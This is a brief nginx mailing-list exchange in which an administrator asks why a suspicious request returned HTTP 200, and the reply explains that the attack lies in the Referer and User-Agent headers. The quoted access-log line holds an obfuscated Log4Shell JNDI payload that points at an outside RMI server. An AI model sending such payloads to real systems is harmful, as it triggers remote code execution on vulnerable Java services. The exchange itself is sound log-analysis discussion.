On Sun, Dec 19, 2021 at 08:02:08PM -0800, li...@lazygranch.com wrote: Hi there,
> I don't have any service using java so I don't believe I am subject to > this exploit. Howerver I am confused why a returned a 200 for this > request. The special characters in the URL are confusing. > > 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-" The request was "GET / HTTP/1.1". A 200 return for that is quite normal. > log_format main '$status $remote_addr - $remote_user > [$time_local] "$request" ' '$body_bytes_sent "$http_referer" ' > '"$http_user_agent" "$http_x_forwarded_for"'; The "please be exploited" parts are in the $http_referer and $http_user_agent parts of your log line. (And so, are presumably in the matching request headers.) Cheers, f -- Francis Daly fran...@daoine.org _______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginx